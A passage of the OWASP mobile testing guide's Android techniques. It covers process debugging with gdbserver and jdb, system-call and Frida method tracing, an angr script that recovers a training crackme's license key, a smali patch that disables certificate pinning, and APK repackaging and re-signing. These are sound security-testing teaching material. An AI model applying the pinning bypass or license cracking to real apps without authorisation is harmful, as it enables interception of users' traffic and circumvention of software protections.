adb push $NDK/prebuilt/android-arm/gdbserver/gdbserver /data/local/tmp\n
The gdbserver --attach
command causes gdbserver to attach to the running process and bind to the IP address and port specified in comm
, which in this case is a HOST:PORT descriptor. Start HelloWorldJNI on the device, then connect to the device and determine the PID of the HelloWorldJNI process (sg.vantagepoint.helloworldjni). Then switch to the root user and attach gdbserver
:
$ adb shell\n$ ps | grep helloworld\nu0_a164 12690 201 1533400 51692 ffffffff 00000000 S sg.vantagepoint.helloworldjni\n$ su\n# /data/local/tmp/gdbserver --attach localhost:1234 12690\nAttached; pid = 12690\nListening on port 1234\n
The process is now suspended, and gdbserver
is listening for debugging clients on port 1234
. With the device connected via USB, you can forward this port to a local port on the host with the abd forward
command:
adb forward tcp:1234 tcp:1234\n
You'll now use the prebuilt version of gdb
included in the NDK toolchain.
$ $TOOLCHAIN/bin/gdb libnative-lib.so\nGNU gdb (GDB) 7.11\n(...)\nReading symbols from libnative-lib.so...(no debugging symbols found)...done.\n(gdb) target remote :1234\nRemote debugging using :1234\n0xb6e0f124 in ?? ()\n
You have successfully attached to the process! The only problem is that you're already too late to debug the JNI function StringFromJNI
; it only runs once, at startup. You can solve this problem by activating the \"Wait for Debugger\" option. Go to Developer Options -> Select debug app and pick HelloWorldJNI, then activate the Wait for debugger switch. Then terminate and re-launch the app. It should be suspended automatically.
Our objective is to set a breakpoint at the first instruction of the native function Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
before resuming the app. Unfortunately, this isn't possible at this point in the execution because libnative-lib.so
isn't yet mapped into process memory, it's loaded dynamically during runtime. To get this working, you'll first use jdb to gently change the process into the desired state.
First, resume execution of the Java VM by attaching jdb. You don't want the process to resume immediately though, so pipe the suspend
command into jdb:
$ adb jdwp\n14342\n$ adb forward tcp:7777 jdwp:14342\n$ { echo \"suspend\"; cat; } | jdb -attach localhost:7777\n
Next, suspend the process where the Java runtime loads libnative-lib.so
. In jdb, set a breakpoint at the java.lang.System.loadLibrary
method and resume the process. After the breakpoint has been reached, execute the step up
command, which will resume the process until loadLibrary
returns. At this point, libnative-lib.so
has been loaded.
> stop in java.lang.System.loadLibrary\n> resume\nAll threads resumed.\nBreakpoint hit: \"thread=main\", java.lang.System.loadLibrary(), line=988 bci=0\n> step up\nmain[1] step up\n>\nStep completed: \"thread=main\", sg.vantagepoint.helloworldjni.MainActivity.<clinit>(), line=12 bci=5\n\nmain[1]\n
Execute gdbserver
to attach to the suspended app. This will cause the app to be suspended by both the Java VM and the Linux kernel (creating a state of \"double-suspension\").
$ adb forward tcp:1234 tcp:1234\n$ $TOOLCHAIN/arm-linux-androideabi-gdb libnative-lib.so\nGNU gdb (GDB) 7.7\nCopyright (C) 2014 Free Software Foundation, Inc.\n(...)\n(gdb) target remote :1234\nRemote debugging using :1234\n0xb6de83b8 in ?? ()\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0032/","title":"Execution Tracing","text":"Besides being useful for debugging, the jdb command line tool offers basic execution tracing functionality. To trace an app right from the start, you can pause the app with the Android \"Wait for Debugger\" feature or a kill -STOP
command and attach jdb to set a deferred method breakpoint on any initialization method. Once the breakpoint is reached, activate method tracing with the trace go methods
command and resume execution. jdb will dump all method entries and exits from that point onwards.
$ adb forward tcp:7777 jdwp:7288\n$ { echo \"suspend\"; cat; } | jdb -attach localhost:7777\nSet uncaught java.lang.Throwable\nSet deferred uncaught java.lang.Throwable\nInitializing jdb ...\n> All threads suspended.\n> stop in com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>()\nDeferring breakpoint com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>().\nIt will be set after the class is loaded.\n> resume\nAll threads resumed.M\nSet deferred breakpoint com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>()\n\nBreakpoint hit: \"thread=main\", com.acme.bob.mobile.android.core.BobMobileApplication.<clinit>(), line=44 bci=0\nmain[1] trace go methods\nmain[1] resume\nMethod entered: All threads resumed.\n
The Dalvik Debug Monitor Server (DDMS) is a GUI tool included with Android Studio. It may not look like much, but its Java method tracer is one of the most awesome tools you can have in your arsenal, and it is indispensable for analyzing obfuscated bytecode.
DDMS is somewhat confusing, however; it can be launched several ways, and different trace viewers will be launched depending on how a method was traced. There's a standalone tool called \"Traceview\" as well as a built-in viewer in Android Studio, both of which offer different ways to navigate the trace. You'll usually use Android studio's built-in viewer, which gives you a zoomable hierarchical timeline of all method calls. However, the standalone tool is also useful, it has a profile panel that shows the time spent in each method along with the parents and children of each method.
To record an execution trace in Android Studio, open the Android tab at the bottom of the GUI. Select the target process in the list and click the little stop watch button on the left. This starts the recording. Once you're done, click the same button to stop the recording. The integrated trace view will open and show the recorded trace. You can scroll and zoom the timeline view with the mouse or trackpad.
Execution traces can also be recorded in the standalone Android Device Monitor. The Device Monitor can be started within Android Studio (Tools -> Android -> Android Device Monitor) or from the shell with the ddms
command.
To start recording tracing information, select the target process in the Devices tab and click Start Method Profiling. Click the stop button to stop recording, after which the Traceview tool will open and show the recorded trace. Clicking any of the methods in the profile panel highlights the selected method in the timeline panel.
DDMS also offers a convenient heap dump button that will dump the Java heap of a process to a .hprof file. The Android Studio user guide contains more information about Traceview.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0032/#tracing-system-calls","title":"Tracing System Calls","text":"Moving down a level in the OS hierarchy, you arrive at privileged functions that require the powers of the Linux kernel. These functions are available to normal processes via the system call interface. Instrumenting and intercepting calls into the kernel is an effective method for getting a rough idea of what a user process is doing, and often the most efficient way to deactivate low-level tampering defenses.
Strace is a standard Linux utility that is not included with Android by default, but can be easily built from source via the Android NDK. It monitors the interaction between processes and the kernel, being a very convenient way to monitor system calls. However, there's a downside: as strace depends on the ptrace
system call to attach to the target process, once anti-debugging measures become active it will stop working.
If the \"Wait for debugger\" feature in Settings > Developer options is unavailable, you can use a shell script to launch the process and immediately attach strace (not an elegant solution, but it works):
while true; do pid=$(pgrep 'target_process' | head -1); if [[ -n \"$pid\" ]]; then strace -s 2000 -e \"!read\" -ff -p \"$pid\"; break; fi; done\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0032/#ftrace","title":"Ftrace","text":"Ftrace is a tracing utility built directly into the Linux kernel. On a rooted device, ftrace can trace kernel system calls more transparently than strace can (strace relies on the ptrace system call to attach to the target process).
Conveniently, the stock Android kernel on both Lollipop and Marshmallow includes ftrace functionality. The feature can be enabled with the following command:
echo 1 > /proc/sys/kernel/ftrace_enabled\n
The /sys/kernel/debug/tracing
directory holds all control and output files related to ftrace. The following files are found in this directory:
The KProbes interface provides an even more powerful way to instrument the kernel: it allows you to insert probes into (almost) arbitrary code addresses within kernel memory. KProbes inserts a breakpoint instruction at the specified address. Once the breakpoint is reached, control passes to the KProbes system, which then executes the user-defined handler function(s) and the original instruction. Besides being great for function tracing, KProbes can implement rootkit-like functionality, such as file hiding.
Jprobes and Kretprobes are other KProbes-based probe types that allow hooking of function entries and exits.
The stock Android kernel comes without loadable module support, which is a problem because Kprobes are usually deployed as kernel modules. The strict memory protection the Android kernel is compiled with is another issue because it prevents the patching of some parts of Kernel memory. Elfmaster's system call hooking method causes a Kernel panic on stock Lollipop and Marshmallow because the sys_call_table is non-writable. You can, however, use KProbes in a sandbox by compiling your own, more lenient Kernel (more on this later).
"},{"location":"MASTG/techniques/android/MASTG-TECH-0033/","title":"Method Tracing","text":"In contrast to method profiling, which tells you how frequently a method is being called, method tracing helps you to also determine its input and output values. This technique can prove to be very useful when dealing with applications that have a big codebase and/or are obfuscated.
If you prefer a GUI-based approach you can use tools such as RMS - Runtime Mobile Security, which enables a more visual experience and includes several convenience tracing options.
If you prefer the command line, Frida offers a useful syntax to query Java classes and methods as well as Java method tracing support for frida-trace via -j
(starting on frida-tools 8.0, Frida 12.10).
Java.enumerateMethods('*youtube*!on*')
uses globs to take all classes that include \"youtube\" as part of their name and enumerate all methods starting with \"on\".-j '*!*certificate*/isu'
triggers a case-insensitive query (i
), including method signatures (s
) and excluding system classes (u
).Refer to the Release Notes for Frida 12.10 for more details on this new feature. To learn more about all options for advanced usage, check the documentation on the official Frida website.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0034/","title":"Native Code Tracing","text":"Native methods tracing can be performed with relative ease compared to Java method tracing. frida-trace
is a CLI tool for dynamically tracing function calls. It makes tracing native functions trivial and can be very useful for collecting information about an application.
In order to use frida-trace
, a Frida server should be running on the device. An example for tracing libc's open
function using frida-trace
is demonstrated below, where -U
connects to the USB device and -i
specifies the function to be included in the trace.
frida-trace -U -i \"open\" com.android.chrome\n
Note how, by default, only the arguments passed to the function are shown, but not the return values. Under the hood, frida-trace
generates one little JavaScript handler file per matched function in the auto-generated __handlers__
folder, which Frida then injects into the process. You can edit these files for more advanced usage such as obtaining the return value of the functions, their input parameters, accessing the memory, etc. Check Frida's JavaScript API for more details.
In this case, the generated script which traces all calls to the open
function in libc.so
is located in __handlers__/libc.so/open.js
, it looks as follows:
{\n    onEnter: function (log, args, state) {\n        log('open(' +\n            'path=\"' + args[0].readUtf8String() + '\"' +\n            ', oflag=' + args[1] +\n            ')');\n    },\n\n\n    onLeave: function (log, retval, state) {\n        log('\\t return: ' + retval); // edited\n    }\n}\n
In the above script, onEnter
takes care of logging the calls to this function and its two input parameters in the right format. You can edit the onLeave
event to print the return values as shown above.
Note that libc is a well-known library, Frida is able to derive the input parameters of its open
function and automatically log them correctly. But this won't be the case for other libraries or for Android Kotlin/Java code. In that case, you may want to obtain the signatures of the functions you're interested in by referring to Android Developers documentation or by reverse engineering the app first.
Another thing to notice in the output above is that it's colorized. An application can have multiple threads running, and each thread can call the open
function independently. By using such a color scheme, the output can be easily visually segregated for each thread.
frida-trace
is a very versatile tool and there are multiple configuration options available such as:
-I
and excluding -X
entire modules.-i \"Java_*\"
(note the use of a glob *
to match all possible functions starting with \"Java_\").-a \"libjpeg.so!0x4793c\"
.frida-trace -U -i \"Java_*\" com.android.chrome\n
Many binaries are stripped and don't have function name symbols available with them. In such cases, a function can be traced using its address as well.
frida-trace -p 1372 -a \"libjpeg.so!0x4793c\"\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0035/","title":"JNI Tracing","text":"As detailed in section Reviewing Disassembled Native Code, the first argument passed to every JNI function is a JNI interface pointer. This pointer contains a table of functions that allows native code to access the Android Runtime. Identifying calls to these functions can help with understanding library functionality, such as what strings are created or Java methods are called.
jnitrace is a Frida based tool similar to frida-trace which specifically targets the usage of Android's JNI API by native libraries, providing a convenient way to obtain JNI method traces including arguments and return values.
You can easily install it by running pip install jnitrace
and run it straight away as follows:
jnitrace -l libnative-lib.so sg.vantagepoint.helloworldjni\n
The -l
option can be provided multiple times to trace multiple libraries, or *
can be provided to trace all libraries. This, however, may provide a lot of output.
In the output you can see the trace of a call to NewStringUTF
made from the native code (its return value is then given back to Java code, see section \"Reviewing Disassembled Native Code\" for more details). Note how similarly to frida-trace, the output is colorized helping to visually distinguish the different threads.
When tracing JNI API calls you can see the thread ID at the top, followed by the JNI method call including the method name, the input arguments and the return value. In the case of a call to a Java method from native code, the Java method arguments will also be supplied. Finally jnitrace will attempt to use the Frida backtracing library to show where the JNI call was made from.
To learn more about all options for advanced usage, check the documentation on the jnitrace GitHub page.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0036/","title":"Emulation-based Analysis","text":"The Android emulator is based on QEMU, a generic and open source machine emulator. QEMU emulates a guest CPU by translating the guest instructions on-the-fly into instructions the host processor can understand. Each basic block of guest instructions is disassembled and translated into an intermediate representation called Tiny Code Generator (TCG). The TCG block is compiled into a block of host instructions, stored in a code cache, and executed. After execution of the basic block, QEMU repeats the process for the next block of guest instructions (or loads the already translated block from the cache). The whole process is called dynamic binary translation.
Because the Android emulator is a fork of QEMU, it comes with all QEMU features, including monitoring, debugging, and tracing facilities. QEMU-specific parameters can be passed to the emulator with the -qemu
command line flag. You can use QEMU's built-in tracing facilities to log executed instructions and virtual register values. Starting QEMU with the -d
command line flag will cause it to dump the blocks of guest code, micro operations, or host instructions being executed. With the -d in_asm
flag, QEMU logs all basic blocks of guest code as they enter QEMU's translation function. The following command logs all translated blocks to a file:
emulator -show-kernel -avd Nexus_4_API_19 -snapshot default-boot -no-snapshot-save -qemu -d in_asm,cpu 2>/tmp/qemu.log\n
Unfortunately, generating a complete guest instruction trace with QEMU is impossible because code blocks are written to the log only at the time they are translated, not when they're taken from the cache. For example, if a block is repeatedly executed in a loop, only the first iteration will be printed to the log. There's no way to disable TB caching in QEMU (besides hacking the source code). Nevertheless, the functionality is sufficient for basic tasks, such as reconstructing the disassembly of a natively executed cryptographic algorithm.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0037/","title":"Symbolic Execution","text":"Symbolic execution is a very useful technique to have in your toolbox, especially while dealing with problems where you need to find a correct input for reaching a certain block of code. In this section, we will solve a simple Android crackme by using the Angr binary analysis framework as our symbolic execution engine.
To demonstrate this technique we'll use a crackme called Android License Validator. The crackme consists of a single ELF executable file, which can be executed on any Android device by following the instructions below:
$ adb push validate /data/local/tmp\n[100%] /data/local/tmp/validate\n\n$ adb shell chmod 755 /data/local/tmp/validate\n\n$ adb shell /data/local/tmp/validate\nUsage: ./validate <serial>\n\n$ adb shell /data/local/tmp/validate 12345\nIncorrect serial (wrong format).\n
So far so good, but we know nothing about what a valid license key looks like. To get started, open the ELF executable in a disassembler such as iaito. The main function is located at offset 0x00001874
in the disassembly. It is important to note that this binary is PIE-enabled, and iaito chooses to load the binary at 0x0
as image base address.
The function names have been stripped from the binary, but luckily there are enough debugging strings to provide us a context to the code. Moving forward, we will start analyzing the binary from the entry function at offset 0x00001874
, and keep a note of all the information easily available to us. During this analysis, we will also try to identify the code regions which are suitable for symbolic execution.
strlen
is called at offset 0x000018a8
, and the returned value is compared to 0x10 at offset 0x000018b0
. Immediately after that, the input string is passed to a Base32 decoding function at offset 0x00001340
. This provides us with valuable information that the input license key is a Base32-encoded 16-character string (which totals 10 bytes in raw). The decoded input is then passed to the function at offset 0x00001760
, which validates the license key. The disassembly of this function is shown below.
We can now use this information about the expected input to further look into the validation function at 0x00001760
.
\u256d (fcn) fcn.00001760 268\n\u2502 fcn.00001760 (int32_t arg1);\n\u2502 ; var int32_t var_20h @ fp-0x20\n\u2502 ; var int32_t var_14h @ fp-0x14\n\u2502 ; var int32_t var_10h @ fp-0x10\n\u2502 ; arg int32_t arg1 @ r0\n\u2502 ; CALL XREF from fcn.00001760 (+0x1c4)\n\u2502 0x00001760 push {r4, fp, lr}\n\u2502 0x00001764 add fp, sp, 8\n\u2502 0x00001768 sub sp, sp, 0x1c\n\u2502 0x0000176c str r0, [var_20h] ; 0x20 ; \"$!\" ; arg1\n\u2502 0x00001770 ldr r3, [var_20h] ; 0x20 ; \"$!\" ; entry.preinit0\n\u2502 0x00001774 str r3, [var_10h] ; str.\n\u2502 ; 0x10\n\u2502 0x00001778 mov r3, 0\n\u2502 0x0000177c str r3, [var_14h] ; 0x14\n\u2502 \u256d\u2500< 0x00001780 b 0x17d0\n\u2502 \u2502 ; CODE XREF from fcn.00001760 (0x17d8)\n\u2502 \u256d\u2500\u2500> 0x00001784 ldr r3, [var_10h] ; str.\n\u2502 \u2502 ; 0x10 ; entry.preinit0\n\u2502 \u254e\u2502 0x00001788 ldrb r2, [r3]\n\u2502 \u254e\u2502 0x0000178c ldr r3, [var_10h] ; str.\n\u2502 \u254e\u2502 ; 0x10 ; entry.preinit0\n\u2502 \u254e\u2502 0x00001790 add r3, r3, 1\n\u2502 \u254e\u2502 0x00001794 ldrb r3, [r3]\n\u2502 \u254e\u2502 0x00001798 eor r3, r2, r3\n\u2502 \u254e\u2502 0x0000179c and r2, r3, 0xff\n\u2502 \u254e\u2502 0x000017a0 mvn r3, 0xf\n\u2502 \u254e\u2502 0x000017a4 ldr r1, [var_14h] ; 0x14 ; entry.preinit0\n\u2502 \u254e\u2502 0x000017a8 sub r0, fp, 0xc\n\u2502 \u254e\u2502 0x000017ac add r1, r0, r1\n\u2502 \u254e\u2502 0x000017b0 add r3, r1, r3\n\u2502 \u254e\u2502 0x000017b4 strb r2, [r3]\n\u2502 \u254e\u2502 0x000017b8 ldr r3, [var_10h] ; str.\n\u2502 \u254e\u2502 ; 0x10 ; entry.preinit0\n\u2502 \u254e\u2502 0x000017bc add r3, r3, 2 ; \"ELF\\x01\\x01\\x01\" ; aav.0x00000001\n\u2502 \u254e\u2502 0x000017c0 str r3, [var_10h] ; str.\n\u2502 \u254e\u2502 ; 0x10\n\u2502 \u254e\u2502 0x000017c4 ldr r3, [var_14h] ; 0x14 ; entry.preinit0\n\u2502 \u254e\u2502 0x000017c8 add r3, r3, 1\n\u2502 \u254e\u2502 0x000017cc str r3, [var_14h] ; 0x14\n\u2502 \u254e\u2502 ; CODE XREF from fcn.00001760 (0x1780)\n\u2502 
\u254e\u2570\u2500> 0x000017d0 ldr r3, [var_14h] ; 0x14 ; entry.preinit0\n\u2502 \u254e 0x000017d4 cmp r3, 4 ; aav.0x00000004 ; aav.0x00000001 ; aav.0x00000001\n\u2502 \u2570\u2500\u2500< 0x000017d8 ble 0x1784 ; likely\n\u2502 0x000017dc ldrb r4, [fp, -0x1c] ; \"4\"\n\u2502 0x000017e0 bl fcn.000016f0\n\u2502 0x000017e4 mov r3, r0\n\u2502 0x000017e8 cmp r4, r3\n\u2502 \u256d\u2500< 0x000017ec bne 0x1854 ; likely\n\u2502 \u2502 0x000017f0 ldrb r4, [fp, -0x1b]\n\u2502 \u2502 0x000017f4 bl fcn.0000170c\n\u2502 \u2502 0x000017f8 mov r3, r0\n\u2502 \u2502 0x000017fc cmp r4, r3\n\u2502 \u256d\u2500\u2500< 0x00001800 bne 0x1854 ; likely\n\u2502 \u2502\u2502 0x00001804 ldrb r4, [fp, -0x1a]\n\u2502 \u2502\u2502 0x00001808 bl fcn.000016f0\n\u2502 \u2502\u2502 0x0000180c mov r3, r0\n\u2502 \u2502\u2502 0x00001810 cmp r4, r3\n\u2502 \u256d\u2500\u2500\u2500< 0x00001814 bne 0x1854 ; likely\n\u2502 \u2502\u2502\u2502 0x00001818 ldrb r4, [fp, -0x19]\n\u2502 \u2502\u2502\u2502 0x0000181c bl fcn.00001728\n\u2502 \u2502\u2502\u2502 0x00001820 mov r3, r0\n\u2502 \u2502\u2502\u2502 0x00001824 cmp r4, r3\n\u2502 \u256d\u2500\u2500\u2500\u2500< 0x00001828 bne 0x1854 ; likely\n\u2502 \u2502\u2502\u2502\u2502 0x0000182c ldrb r4, [fp, -0x18]\n\u2502 \u2502\u2502\u2502\u2502 0x00001830 bl fcn.00001744\n\u2502 \u2502\u2502\u2502\u2502 0x00001834 mov r3, r0\n\u2502 \u2502\u2502\u2502\u2502 0x00001838 cmp r4, r3\n\u2502 \u256d\u2500\u2500\u2500\u2500\u2500< 0x0000183c bne 0x1854 ; likely\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x00001840 ldr r3, [0x0000186c] ; [0x186c:4]=0x270 section..hash ; section..hash\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x00001844 add r3, pc, r3 ; 0x1abc ; \"Product activation passed. Congratulations!\"\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x00001848 mov r0, r3 ; 0x1abc ; \"Product activation passed. 
Congratulations!\" ;\n\u2502 \u2502\u2502\u2502\u2502\u2502 0x0000184c bl sym.imp.puts ; int puts(const char *s)\n\u2502 \u2502\u2502\u2502\u2502\u2502 ; int puts(\"Product activation passed. Congratulations!\")\n\u2502 \u256d\u2500\u2500\u2500\u2500\u2500\u2500< 0x00001850 b 0x1864\n\u2502 \u2502\u2502\u2502\u2502\u2502\u2502 ; CODE XREFS from fcn.00001760 (0x17ec, 0x1800, 0x1814, 0x1828, 0x183c)\n\u2502 \u2502\u2570\u2570\u2570\u2570\u2570\u2500> 0x00001854 ldr r3, aav.0x00000288 ; [0x1870:4]=0x288 aav.0x00000288\n\u2502 \u2502 0x00001858 add r3, pc, r3 ; 0x1ae8 ; \"Incorrect serial.\" ;\n\u2502 \u2502 0x0000185c mov r0, r3 ; 0x1ae8 ; \"Incorrect serial.\" ;\n\u2502 \u2502 0x00001860 bl sym.imp.puts ; int puts(const char *s)\n\u2502 \u2502 ; int puts(\"Incorrect serial.\")\n\u2502 \u2502 ; CODE XREF from fcn.00001760 (0x1850)\n\u2502 \u2570\u2500\u2500\u2500\u2500\u2500\u2500> 0x00001864 sub sp, fp, 8\n\u2570 0x00001868 pop {r4, fp, pc} ; entry.preinit0 ; entry.preinit0 ;\n
Discussing all the instructions in the function is beyond the scope of this chapter, instead we will discuss only the important points needed for the analysis. In the validation function, there is a loop present at 0x00001784
which performs a XOR operation at offset 0x00001798
. The loop is more clearly visible in the graph view below.
XOR is a very commonly used technique to encrypt information where obfuscation is the goal rather than security. XOR should not be used for any serious encryption, as it can be cracked using frequency analysis. Therefore, the mere presence of XOR encryption in such a validation logic always requires special attention and analysis.
Moving forward, at offset 0x000017dc
, the XOR decoded value obtained from above is being compared against the return value from a sub-function call at 0x000017e8
.
Clearly this function is not complex, and can be analyzed manually, but still remains a cumbersome task. Especially while working on a big code base, time can be a major constraint, and it is desirable to automate such analysis. Dynamic symbolic execution is helpful in exactly those situations. In the above crackme, the symbolic execution engine can determine the constraints on each byte of the input string by mapping a path between the first instruction of the license check (at 0x00001760
) and the code that prints the \"Product activation passed\" message (at 0x00001840
).
The constraints obtained from the above steps are passed to a solver engine, which finds an input that satisfies them - a valid license key.
You need to perform several steps to initialize Angr's symbolic execution engine:
Load the binary into a Project
, which is the starting point for any kind of analysis in Angr.
Pass the address from which the analysis should start. In this case, we will initialize the state with the first instruction of the serial validation function. This makes the problem significantly easier to solve because you avoid symbolically executing the Base32 implementation.
Pass the address of the code block that the analysis should reach. In this case, that's the offset 0x00001840
, where the code responsible for printing the \"Product activation passed\" message is located.
Also, specify the addresses that the analysis should not reach. In this case, the code block that prints the \"Incorrect serial\" message at 0x00001854
is not interesting.
Note that the Angr loader will load the PIE executable with a base address of 0x400000
, which needs to be added to the offsets from iaito before passing it to Angr.
The final solution script is presented below:
import angr # Version: 9.2.2\nimport base64\n\nload_options = {}\n\nb = angr.Project(\"./validate\", load_options = load_options)\n# The key validation function starts at 0x401760, so that's where we create the initial state.\n# This speeds things up a lot because we're bypassing the Base32-encoder.\n\noptions = {\n angr.options.SYMBOL_FILL_UNCONSTRAINED_MEMORY,\n angr.options.ZERO_FILL_UNCONSTRAINED_REGISTERS,\n}\n\nstate = b.factory.blank_state(addr=0x401760, add_options=options)\n\nsimgr = b.factory.simulation_manager(state)\nsimgr.explore(find=0x401840, avoid=0x401854)\n\n# 0x401840 = Product activation passed\n# 0x401854 = Incorrect serial\nfound = simgr.found[0]\n\n# Get the solution string from *(R11 - 0x20).\n\naddr = found.memory.load(found.regs.r11 - 0x20, 1, endness=\"Iend_LE\")\nconcrete_addr = found.solver.eval(addr)\nsolution = found.solver.eval(found.memory.load(concrete_addr,10), cast_to=bytes)\nprint(base64.b32encode(solution))\n
As discussed previously in the section \"Dynamic Binary Instrumentation\", the symbolic execution engine constructs a binary tree of the operations for the program input given and generates a mathematical equation for each possible path that might be taken. Internally, Angr explores all the paths between the two points specified by us, and passes the corresponding mathematical equations to the solver to return meaningful concrete results. We can access these solutions via simulation_manager.found
list, which contains all the possible paths explored by Angr that satisfy our specified search criteria.
Take a closer look at the latter part of the script where the final solution string is being retrieved. The address of the string is obtained from address r11 - 0x20
. This may appear magical at first, but a careful analysis of the function at 0x00001760
holds the clue, as it determines if the given input string is a valid license key or not. In the disassembly above, you can see how the input string to the function (in register R0) is stored into a local stack variable 0x0000176c str r0, [var_20h]
. Hence, we decided to use this value to retrieve the final solution in the script. Using found.solver.eval
you can ask the solver questions like \"given the output of this sequence of operations (the current state in found
), what must the input (at addr
) have been?\".
In ARMv7, R11 is called fp (frame pointer), therefore R11 - 0x20
is equivalent to fp-0x20
: var int32_t var_20h @ fp-0x20
Next, the endness
parameter in the script specifies that the data is stored in \"little-endian\" fashion, which is the case for almost all of the Android devices.
Also, it may appear as if the script is simply reading the solution string from the memory of the analyzed program. However, it's reading it from the symbolic memory. Neither the string nor the pointer to the string actually exist. The solver ensures that the solution it provides is the same as if the program were executed to that point.
Running this script should return the following output:
$ python3 solve.py\nWARNING | ... | cle.loader | The main binary is a position-independent executable. It is being loaded with a base address of 0x400000.\n\nb'JACE6ACIARNAAIIA'\n
Now you can run the validate binary in your Android device to verify the solution as indicated here.
You may obtain different solutions using the script, as there are multiple valid license keys possible.
To conclude, learning symbolic execution might look a bit intimidating at first, as it requires deep understanding and extensive practice. However, the effort is justified considering the valuable time it can save in contrast to analyzing complex disassembled instructions manually. Typically you'd use hybrid techniques, as in the above example, where we performed manual analysis of the disassembled code to provide the correct criteria to the symbolic execution engine. Please refer to the iOS chapter for more examples on Angr usage.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0038/","title":"Patching","text":"Making small changes to the Android Manifest or bytecode is often the quickest way to fix small annoyances that prevent you from testing or reverse engineering an app. On Android, two issues in particular happen regularly:
android:debuggable
flag is not set to \"true\"
in the Android Manifest.In most cases, both issues can be fixed by making minor changes to the app (aka. patching) and then re-signing and repackaging it. Apps that run additional integrity checks beyond default Android code-signing are an exception. In those cases, you have to patch the additional checks as well.
The first step is unpacking and disassembling the APK with apktool
:
apktool d target_apk.apk\n
Note: To save time, you may use the flag --no-src
if you only want to unpack the APK but not disassemble the code. For example, when you only want to modify the Android Manifest and repack immediately.
Certificate pinning is an issue for security testers who want to intercept HTTPS communication for legitimate reasons. Patching bytecode to deactivate SSL pinning can help with this. To demonstrate bypassing certificate pinning, we'll walk through an implementation in an example application.
Once you've unpacked and disassembled the APK, it's time to find the certificate pinning checks in the Smali source code. Searching the code for keywords such as \"X509TrustManager\" should point you in the right direction.
In our example, a search for \"X509TrustManager\" returns one class that implements a custom TrustManager. The derived class implements the methods checkClientTrusted
, checkServerTrusted
, and getAcceptedIssuers
.
To bypass the pinning check, add the return-void
opcode to the first line of each method. This opcode causes the checks to return immediately. With this modification, no certificate checks are performed, and the application accepts all certificates.
.method public checkServerTrusted([LJava/security/cert/X509Certificate;Ljava/lang/String;)V\n .locals 3\n .param p1, \"chain\" # [Ljava/security/cert/X509Certificate;\n .param p2, \"authType\" # Ljava/lang/String;\n\n .prologue\n return-void # <-- OUR INSERTED OPCODE!\n .line 102\n iget-object v1, p0, Lasdf/t$a;->a:Ljava/util/ArrayList;\n\n invoke-virtual {v1}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;\n\n move-result-object v1\n\n :goto_0\n invoke-interface {v1}, Ljava/util/Iterator;->hasNext()Z\n
This modification will break the APK signature, so you'll also have to re-sign the altered APK archive after repackaging it.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0038/#patching-example-making-an-app-debuggable","title":"Patching Example: Making an App Debuggable","text":"Every debugger-enabled process runs an extra thread for handling JDWP protocol packets. This thread is started only for apps that have the android:debuggable=\"true\"
flag set in their manifest file's <application>
element. This is the typical configuration of Android devices shipped to end users.
When reverse engineering apps, you'll often have access to the target app's release build only. Release builds aren't meant to be debugged, that's the purpose of debug builds. If the system property ro.debuggable
is set to \"0\", Android disallows both JDWP and native debugging of release builds. Although this is easy to bypass, you're still likely to encounter limitations, such as a lack of line breakpoints. Nevertheless, even an imperfect debugger is still an invaluable tool, being able to inspect the runtime state of a program makes understanding the program a lot easier.
To convert a release build into a debuggable build, you need to modify a flag in the Android Manifest file (AndroidManifest.xml). Once you've unpacked the app (e.g. apktool d --no-src UnCrackable-Level1.apk
) and decoded the Android Manifest, add android:debuggable=\"true\"
to it using a text editor:
<application android:allowBackup=\"true\" android:debuggable=\"true\" android:icon=\"@drawable/ic_launcher\" android:label=\"@string/app_name\" android:name=\"com.xxx.xxx.xxx\" android:theme=\"@style/AppTheme\">\n
Even if we haven't altered the source code, this modification also breaks the APK signature, so you'll also have to re-sign the altered APK archive.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0038/#patching-react-native-applications","title":"Patching React Native applications","text":"If the React Native framework has been used for development, then the main application code is located in the file assets/index.android.bundle
. This file contains the JavaScript code. Most of the time, the JavaScript code in this file is minified. By using the tool JStillery a human readable version of the file can be retrieved, allowing code analysis. The CLI version of JStillery or the local server should be preferred instead of using the online version as otherwise source code is sent and disclosed to a 3rd party.
The following approach can be used in order to patch the JavaScript file:
apktool
tool.assets/index.android.bundle
into a temporary file.JStillery
to beautify and deobfuscate the content of the temporary file.assets/index.android.bundle
file.apktool
tool and sign it before installing it on the target device/emulator.You can easily repackage an app by doing the following:
cd UnCrackable-Level1\napktool b\nzipalign -v 4 dist/UnCrackable-Level1.apk ../UnCrackable-Repackaged.apk\n
Note that the Android Studio build tools directory must be in the path. It is located at [SDK-Path]/build-tools/[version]
. The zipalign
and apksigner
tools are in this directory.
Before re-signing, you first need a code-signing certificate. If you have built a project in Android Studio before, the IDE has already created a debug keystore and certificate in $HOME/.android/debug.keystore
. The default password for this KeyStore is \"android\" and the key is called \"androiddebugkey\".
The standard Java distribution includes keytool
for managing KeyStores and certificates. You can create your own signing certificate and key, then add it to the debug KeyStore:
keytool -genkey -v -keystore ~/.android/debug.keystore -alias signkey -keyalg RSA -keysize 2048 -validity 20000\n
After the certificate is available, you can re-sign the APK with it. Be sure that apksigner
is in the path and that you run it from the folder where your repackaged APK is located.
apksigner sign --ks ~/.android/debug.keystore --ks-key-alias signkey UnCrackable-Repackaged.apk\n
Note: If you experience JRE compatibility issues with apksigner
, you can use jarsigner
instead. When you do this, zipalign
must be called after signing.
jarsigner -verbose -keystore ~/.android/debug.keystore ../UnCrackable-Repackaged.apk signkey\nzipalign -v 4 dist/UnCrackable-Level1.apk ../UnCrackable-Repackaged.apk\n
Now you may reinstall the app:
